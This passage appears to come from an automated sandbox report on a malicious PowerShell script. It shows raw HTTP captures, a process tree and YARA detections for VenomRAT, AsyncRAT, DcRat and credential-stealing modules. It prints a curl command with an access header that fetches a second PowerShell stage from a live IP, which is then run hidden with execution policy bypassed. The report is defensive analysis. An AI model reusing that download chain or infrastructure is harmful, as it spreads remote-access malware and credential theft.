                                                                          Data Ascii: HQU4xXS5vUkJtQkZ+JWM0fSZEUD9FYkk6QkVdoZOzuZPxuY+Q6aWulJ+N2MfQgKKuh8uh3eOJ+/GBtrKv+5KJ74SGi/6YhomywoWatJTdub2Vl5fmj67nmpGI
                                                                          Jan 7, 2025 06:12:02.892579079 CET1236INData Raw: 00 6a 00 38 00 53 00 4b 00 56 00 70 00 55 00 49 00 6e 00 67 00 50 00 63 00 33 00 39 00 56 00 58 00 6a 00 51 00 33 00 43 00 31 00 68 00 50 00 59 00 31 00 39 00 72 00 54 00 30 00 31 00 45 00 57 00 48 00 39 00 41 00 58 00 77 00 68 00 56 00 5a 00 45
                                                                          Data Ascii: j8SKVpUIngPc39VXjQ3C1hPY19rT01EWH9AXwhVZEFAc01BU2Y7Hk1fX0BxRmBJZGBrLSBAQT1nfHdtQxVScX5TU1dyO0tbfkNIfFqGooGvubTf0ZuFv4GEoK
                                                                          Jan 7, 2025 06:12:02.892591000 CET1236INData Raw: 00 77 00 44 00 6d 00 55 00 4d 00 49 00 42 00 41 00 64 00 44 00 6b 00 6f 00 65 00 4c 00 69 00 6f 00 4d 00 46 00 44 00 5a 00 56 00 47 00 68 00 63 00 61 00 4f 00 79 00 51 00 77 00 4e 00 54 00 67 00 4e 00 4c 00 51 00 46 00 6b 00 61 00 77 00 41 00 56
                                                                          Data Ascii: wDmUMIBAdDkoeLioMFDZVGhcaOyQwNTgNLQFkawAVLAs6CQIZMQQiMwk8M1tbVQkVAx44NxM2ThsIMxYhbGV8WmlNXmJZVFpVb05QZ11EIR11S21hQ3V4TXQL
                                                                          Jan 7, 2025 06:12:02.897439003 CET1236INData Raw: 00 4a 00 6a 00 57 00 39 00 4e 00 4c 00 39 00 35 00 64 00 7a 00 43 00 30 00 64 00 32 00 44 00 79 00 36 00 47 00 66 00 2f 00 72 00 4c 00 33 00 76 00 5a 00 4f 00 62 00 67 00 61 00 36 00 47 00 67 00 34 00 2f 00 72 00 2b 00 62 00 53 00 69 00 34 00 62
                                                                          Data Ascii: JjW9NL95dzC0d2Dy6Gf/rL3vZObga6Gg4/r+bSi4bb7qNPMpPj41aH65d32xhIyDgMiIyIZJAYKKzYiEjkZDUAcGEIlPCMxEyZOMSwZEjcwAicFCy9kTl4xOB
                                                                          Jan 7, 2025 06:12:04.393440962 CET157OUTGET /infopage/utres.exe HTTP/1.1
                                                                          X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                          Host: 147.45.44.131
                                                                          Jan 7, 2025 06:12:04.580173016 CET1236INHTTP/1.1 200 OK
                                                                          Date: Tue, 07 Jan 2025 05:12:04 GMT
                                                                          Server: Apache/2.4.52 (Ubuntu)
                                                                          Last-Modified: Mon, 06 Jan 2025 15:11:38 GMT
                                                                          ETag: "2fdc00-62b0b0b870bd8"
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 3136512
                                                                          Content-Type: application/x-msdos-program
                                                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6e 66 5c 67 00 00 00 00 00 00 00 00 e0 00 02 00 0b 01 08 00 00 ca 2f 00 00 10 00 00 00 00 00 00 ee e8 2f 00 00 20 00 00 00 00 30 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 40 30 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 98 e8 2f 00 53 00 00 00 00 00 30 00 f7 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 30 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELnf\g// 0@ @0@/S0 0 H.text/ / `.rsrc0/@@.reloc 0/@B/HG<4#Vwd!HAZI1YT8Dc[2njlOs]yx<mt8*B-rIg:mej{Um79;$QWAA0V0yh`4bE=WM&,C:])#lAG8B3O);"L"p<19;YF 8fK?WEw:7i(}jY2]u{1Crh:bvJn5)catiS/r68XNd/xeN[>F$y'E}+iG<


                                                                          Click to jump to process

                                                                          Click to jump to process

                                                                          Click to dive into process behavior distribution

                                                                          Click to jump to process

                                                                          Target ID:0
                                                                          Start time:00:11:55
                                                                          Start date:07/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\sfqbr.ps1"
                                                                          Imagebase:0x7ff6e3d50000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:1
                                                                          Start time:00:11:55
                                                                          Start date:07/01/2025
                                                                          Path:C:\Windows\System32\conhost.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          Imagebase:0x7ff66e660000
                                                                          File size:862'208 bytes
                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:3
                                                                          Start time:00:11:59
                                                                          Start date:07/01/2025
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\system32\cmd.exe" /c "C:\Windows\Temp\Pack.bat"
                                                                          Imagebase:0x7ff6d1900000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:4
                                                                          Start time:00:11:59
                                                                          Start date:07/01/2025
                                                                          Path:C:\Windows\System32\cmd.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:cmd.exe /c curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1
                                                                          Imagebase:0x7ff6d1900000
                                                                          File size:289'792 bytes
                                                                          MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:5
                                                                          Start time:00:11:59
                                                                          Start date:07/01/2025
                                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:powershell -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command -"
                                                                          Imagebase:0x7ff6e3d50000
                                                                          File size:452'608 bytes
                                                                          MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2322702408.0000029DEBE46000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000005.00000002.2322702408.0000029DEC168000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:6
                                                                          Start time:00:11:59
                                                                          Start date:07/01/2025
                                                                          Path:C:\Windows\System32\curl.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:curl -s -H "X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq" http://147.45.44.131/infopage/sfxqr.ps1
                                                                          Imagebase:0x7ff648350000
                                                                          File size:530'944 bytes
                                                                          MD5 hash:EAC53DDAFB5CC9E780A7CC086CE7B2B1
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:7
                                                                          Start time:00:12:02
                                                                          Start date:07/01/2025
                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nfy3200k\nfy3200k.cmdline"
                                                                          Imagebase:0x7ff660330000
                                                                          File size:2'759'232 bytes
                                                                          MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:moderate
                                                                          Has exited:true

                                                                          Target ID:8
                                                                          Start time:00:12:03
                                                                          Start date:07/01/2025
                                                                          Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                          Wow64 process (32bit):false
                                                                          Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES617A.tmp" "c:\Users\user\AppData\Local\Temp\nfy3200k\CSCAAE263D2780F40D49B69A6171B4A2D61.TMP"
                                                                          Imagebase:0x7ff64f690000
                                                                          File size:52'744 bytes
                                                                          MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Reputation:high
                                                                          Has exited:true

                                                                          Target ID:9
                                                                          Start time:00:12:06
                                                                          Start date:07/01/2025
                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                                          Imagebase:0xca0000
                                                                          File size:65'440 bytes
                                                                          MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_DcRat_2, Description: Yara detected DcRat, Source: 00000009.00000002.4582340011.0000000003204000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_VenomRAT, Description: Yara detected VenomRAT, Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_StormKitty, Description: Yara detected StormKitty Stealer, Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_BrowserPasswordDump_1, Description: Yara detected BrowserPasswordDump, Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: JoeSecurity_Keylogger_Generic_3, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                          • Rule: Windows_Trojan_DCRat_1aeea1ac, Description: unknown, Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                          • Rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex, Description: Detects executables referencing Discord tokens regular expressions, Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000009.00000002.4562176315.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                          Reputation:high
                                                                          Has exited:false

                                                                          Reset < >
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2192683299.00007FFD34570000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34570000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ffd34570000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction ID: 6092f30a2067239bc618a92cdbe94799d7b05a720db2ac052bb5579e628d6b94
                                                                            • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                            • Instruction Fuzzy Hash: EA01677121CB0C4FD754EF0CE451AA5B7E0FB95364F10056DE58AC36A5DB36E882CB45

                                                                            Execution Graph

                                                                            Execution Coverage:1.6%
                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                            Signature Coverage:0%
                                                                            Total number of Nodes:3
                                                                            Total number of Limit Nodes:0
                                                                            execution_graph 12205 7ffd3454c809 12206 7ffd3454c80f CreateFileW 12205->12206 12208 7ffd3454c8de 12206->12208

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 0 7ffd34545f80-7ffd3454b59a 4 7ffd3454b5d0-7ffd3454b603 0->4 5 7ffd3454b59c-7ffd3454b5c0 0->5 8 7ffd3454b7f4-7ffd3454b809 4->8 9 7ffd3454b609-7ffd3454b614 4->9 11 7ffd3454b5c2-7ffd3454b5c7 call 7ffd34545fe0 5->11 12 7ffd3454b5cc-7ffd3454b5cd 5->12 20 7ffd3454b813-7ffd3454b81a 8->20 21 7ffd3454b80b-7ffd3454b812 8->21 13 7ffd3454b682-7ffd3454b687 9->13 14 7ffd3454b616-7ffd3454b61e 9->14 11->12 12->4 18 7ffd3454b6f3-7ffd3454b6fd 13->18 19 7ffd3454b689-7ffd3454b695 13->19 14->8 17 7ffd3454b624-7ffd3454b639 14->17 24 7ffd3454b662-7ffd3454b66d 17->24 25 7ffd3454b63b-7ffd3454b660 17->25 22 7ffd3454b71f-7ffd3454b727 18->22 23 7ffd3454b6ff-7ffd3454b71d call 7ffd34546000 18->23 19->8 26 7ffd3454b69b-7ffd3454b6ae 19->26 27 7ffd3454b850-7ffd3454b85e 20->27 28 7ffd3454b81c-7ffd3454b84d 20->28 21->20 31 7ffd3454b72a-7ffd3454b735 22->31 23->22 24->8 30 7ffd3454b673-7ffd3454b680 24->30 25->24 34 7ffd3454b6b0-7ffd3454b6b3 25->34 26->31 35 7ffd3454b860-7ffd3454b866 27->35 36 7ffd3454b87b-7ffd3454b88c 27->36 28->27 30->13 30->14 31->8 37 7ffd3454b73b-7ffd3454b756 31->37 38 7ffd3454b6bf-7ffd3454b6c7 34->38 39 7ffd3454b6b5 34->39 41 7ffd3454b8c1-7ffd3454b8d8 35->41 42 7ffd3454b868-7ffd3454b879 35->42 43 7ffd3454b89d-7ffd3454b8c0 36->43 44 7ffd3454b88e-7ffd3454b899 36->44 37->8 45 7ffd3454b75c-7ffd3454b76f 37->45 38->8 47 7ffd3454b6cd-7ffd3454b6f2 38->47 39->38 59 7ffd3454b92e-7ffd3454b93a 41->59 60 7ffd3454b8da 41->60 42->35 42->36 45->8 46 7ffd3454b775-7ffd3454b786 45->46 46->8 57 7ffd3454b788-7ffd3454b797 46->57 63 7ffd3454b7e2-7ffd3454b7f3 57->63 64 7ffd3454b799-7ffd3454b7a4 57->64 61 7ffd3454b94e-7ffd3454b95f 59->61 62 7ffd3454b93c-7ffd3454b94c 59->62 65 7ffd3454b910-7ffd3454b92d 60->65 66 7ffd3454b8dc-7ffd3454b90d 60->66 67 7ffd3454b961-7ffd3454b96c 61->67 68 7ffd3454b970-7ffd3454b9a1 61->68 62->61 62->62 64->63 75 7ffd3454b7a6-7ffd3454b7dd call 7ffd34546000 64->75 65->59 66->65 67->68 78 7ffd3454b9a3-7ffd3454b9a9 68->78 79 7ffd3454b9f7-7ffd3454b9fe 68->79 75->63 78->79 83 7ffd3454b9ab-7ffd3454b9ac 78->83 81 7ffd3454ba3f-7ffd3454ba68 79->81 82 7ffd3454ba00-7ffd3454ba01 79->82 84 7ffd3454ba04-7ffd3454ba07 82->84 85 7ffd3454b9af-7ffd3454b9b2 83->85 87 7ffd3454ba69-7ffd3454bb39 84->87 88 7ffd3454ba09-7ffd3454ba1a 84->88 85->87 90 7ffd3454b9b8-7ffd3454b9c8 85->90 106 7ffd3454bb42-7ffd3454bbb8 87->106 92 7ffd3454ba1c-7ffd3454ba22 88->92 93 7ffd3454ba36-7ffd3454ba3d 88->93 94 7ffd3454b9f0-7ffd3454b9f5 90->94 95 7ffd3454b9ca-7ffd3454b9ec 90->95 92->87 96 7ffd3454ba24-7ffd3454ba32 92->96 93->81 93->84 94->79 94->85 95->94 96->93 111 7ffd3454bb3d-7ffd3454bb41 106->111 112 7ffd3454bbba-7ffd3454bd4c call 7ffd34544620 106->112 111->106 132 7ffd3454bd4e-7ffd3454bd93 112->132 133 7ffd3454bd9a-7ffd3454bdb6 132->133 135 7ffd3454bdbc-7ffd3454bdd5 133->135 136 7ffd3454bdb8-7ffd3454bdba 133->136 138 7ffd3454bdd7-7ffd3454be9e call 7ffd34546de8 135->138 136->138 150 7ffd3454bea4-7ffd3454bf57 call 7ffd34546d98 138->150 151 7ffd3454bf58-7ffd3454bf98 138->151 150->151 157 7ffd3454bf9e-7ffd3454bfac 151->157 158 7ffd3454c089-7ffd3454c0b5 call 7ffd3454c12e 151->158 160 7ffd3454c041-7ffd3454c088 157->160 161 7ffd3454bfb2-7ffd3454bfbd 157->161 175 7ffd3454c11b-7ffd3454c12d 158->175 176 7ffd3454c0b7-7ffd3454c0fb call 7ffd34542ed8 158->176 160->158
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0Sr4$0Sr4$0bu4$8=T4$PAu4$bP\4$d$hN_H$p2u4$p2u4$p2u4$_T4
                                                                            • API String ID: 0-655304936
                                                                            • Opcode ID: 9be7a8f99241faf528f1b3bd015e5c563884262bb6f2354dca28b1c620729c27
                                                                            • Instruction ID: c71c49324a4de99816328832629a34a40335ff36ad29d7fe15ae5734cbf59e52
                                                                            • Opcode Fuzzy Hash: 9be7a8f99241faf528f1b3bd015e5c563884262bb6f2354dca28b1c620729c27
                                                                            • Instruction Fuzzy Hash: 44824931F0DA8A4FE75ADB2884A56B577D1FF96310B0445BED18FCB293DE28A8038741

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0bu4$bP\4$hN_H$p2u4$p2u4$p2u4
                                                                            • API String ID: 0-4047881340
                                                                            • Opcode ID: 4669ff0aaed60daafa7b9d8d9031851fb62437ee38a02b81ebca63b167212201
                                                                            • Instruction ID: d3aca657dcd3529a9619fa3517c00f174e0a44f33aba26523e8fb2cc4c868fb3
                                                                            • Opcode Fuzzy Hash: 4669ff0aaed60daafa7b9d8d9031851fb62437ee38a02b81ebca63b167212201
                                                                            • Instruction Fuzzy Hash: C2F12C71B1EA850FE759DB78446A6B97BD1EF96350B0444FED08ECF3A2CD2CA8028741

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0bu4$hN_H$p2u4$p2u4$p2u4
                                                                            • API String ID: 0-307878793
                                                                            • Opcode ID: 2f6995ed61d97c437599d73928cc70052ba731af01eeaa3c63f1e1fabd6a3e1a
                                                                            • Instruction ID: 252152ca292c8b5dad60aad13f348b5b1599337795cf329bf00986a02a3a9d98
                                                                            • Opcode Fuzzy Hash: 2f6995ed61d97c437599d73928cc70052ba731af01eeaa3c63f1e1fabd6a3e1a
                                                                            • Instruction Fuzzy Hash: FFE12C71B1EA850FE75AD778446A6B97BD1EF96300B0445FED08ECF3A2CD1CA8028741

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0bu4$hN_H$p2u4$p2u4$p2u4
                                                                            • API String ID: 0-307878793
                                                                            • Opcode ID: 8c8af3d59c85fe19f06002c3ccfe898ced13c537a214b71362da40e33f93ef6f
                                                                            • Instruction ID: 9b95dd9fb87a56720080fc18c1f62c5c6bf5aa62ea4b1cb5321af9923096fe30
                                                                            • Opcode Fuzzy Hash: 8c8af3d59c85fe19f06002c3ccfe898ced13c537a214b71362da40e33f93ef6f
                                                                            • Instruction Fuzzy Hash: 69B1C771B1E9850FE759D77844AA6B97BD1EF96340B0444FED18ECF3A2CD18A8029741

                                                                            Control-flow Graph

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: 0bu4$p2u4$p2u4$p2u4
                                                                            • API String ID: 0-1214291319
                                                                            • Opcode ID: cc9959455e46a68a4b5b78bfb2ab8afaaa83a0facab99757a2a29cbad38e95a1
                                                                            • Instruction ID: 7954415b6afa9ca2a30eacf309eca52b1648c2f379e7cd657ce52f20970426b6
                                                                            • Opcode Fuzzy Hash: cc9959455e46a68a4b5b78bfb2ab8afaaa83a0facab99757a2a29cbad38e95a1
                                                                            • Instruction Fuzzy Hash: 12A1D871B0E9850FE75A977854BA6B97BD1EF96340B0444FED18ECF3A2CD1CA8029741

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
                                                                            control_flow_graph 469 7ffd3454d2eb-7ffd3454d2ec 470 7ffd3454d322 469->470 471 7ffd3454d2ee-7ffd3454d31e 469->471 473 7ffd3454d372 470->473 474 7ffd3454d324-7ffd3454d362 470->474 471->470 476 7ffd3454d3c2-7ffd3454d3cf call 7ffd3454cfe0 473->476 477 7ffd3454d374-7ffd3454d37a 473->477 486 7ffd3454d3b2-7ffd3454d3b8 474->486 495 7ffd3454d364-7ffd3454d36e 474->495 481 7ffd3454d3d4-7ffd3454d3e1 476->481 483 7ffd3454d3b0 477->483 484 7ffd3454d37c-7ffd3454d3ae 477->484 483->486 484->483 492 7ffd3454d3ba-7ffd3454d3c0 486->492 493 7ffd3454d40b-7ffd3454d412 486->493 492->476 496 7ffd3454d462 493->496 497 7ffd3454d414-7ffd3454d422 493->497 495->473 501 7ffd3454d4b2 496->501 502 7ffd3454d464-7ffd3454d46a 496->502 499 7ffd3454d472 497->499 500 7ffd3454d424-7ffd3454d441 497->500 503 7ffd3454d4c2-7ffd3454d501 499->503 504 7ffd3454d474-7ffd3454d4ae 499->504 507 7ffd3454d4b3-7ffd3454d4b9 500->507 519 7ffd3454d443-7ffd3454d44d 500->519 506 7ffd3454d502-7ffd3454d509 501->506 501->507 508 7ffd3454d4ba 502->508 509 7ffd3454d46c-7ffd3454d471 502->509 503->506 504->501 511 7ffd3454d50a-7ffd3454d541 506->511 507->508 508->511 512 7ffd3454d4bc-7ffd3454d4c1 508->512 509->499 525 7ffd3454d5b2-7ffd3454d5b9 511->525 526 7ffd3454d543-7ffd3454d549 511->526 512->503 519->496 529 7ffd3454d5ba-7ffd3454d5f1 525->529 526->529 530 7ffd3454d54b-7ffd3454d5b1 526->530 530->525
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000005.00000002.2353904905.00007FFD34540000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34540000, based on PE: false
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_5_2_7ffd34540000_powershell.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: oN_^$tN_
                                                                            • API String ID: 0-1849739789
                                                                            • Opcode ID: e235d5c1999742dc7206157b78a796c537525e4076f394775979fec7ce42325a
                                                                            • Instruction ID: 121a772275e12badea1767ed33f76f35719fa4042bb6c4f924e38e831c02b14a
                                                                            • Opcode Fuzzy Hash: e235d5c1999742dc7206157b78a796c537525e4076f394775979fec7ce42325a
                                                                            • Instruction Fuzzy Hash: B5A1E217F0C93627E61577ADB8A51EA7784EF923B67084177D388CD293A90DB88A43D0

                                                                            Control-flow Graph

                                                                            • Executed
                                                                            • Not Executed
